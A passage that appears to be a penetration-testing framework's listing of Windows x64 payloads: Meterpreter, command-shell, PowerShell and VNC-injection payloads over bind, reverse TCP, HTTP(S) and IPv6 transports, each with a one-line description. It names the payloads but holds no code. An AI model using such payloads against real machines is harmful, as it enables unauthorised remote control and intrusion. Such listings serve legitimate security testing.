windows/x64/meterpreter/bind_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection (Windows x64)
windows/x64/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection with UUID Support (Windows x64)
windows/x64/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection (Windows x64)
windows/x64/meterpreter/bind_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection with UUID Support (Windows x64)
windows/x64/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/meterpreter/reverse_https Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
windows/x64/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)
windows/x64/meterpreter/reverse_winhttp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 winhttp)
windows/x64/meterpreter/reverse_winhttps Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTPS (Windows x64 winhttp)
windows/x64/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell
windows/x64/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session
windows/x64/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session
windows/x64/shell/bind_ipv6_tcp Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)
windows/x64/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)
windows/x64/shell/bind_tcp Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)
windows/x64/shell/bind_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)
windows/x64/shell/reverse_tcp Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)
windows/x64/shell/reverse_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)
windows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)
windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)
windows/x64/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)
windows/x64/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)
windows/x64/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)
windows/x64/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)
windows/x64/vncinject/reverse_http Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/vncinject/reverse_https Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)
windows/x64/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)
windows/x64/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)
windows/x64/vncinject/reverse_winhttps Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)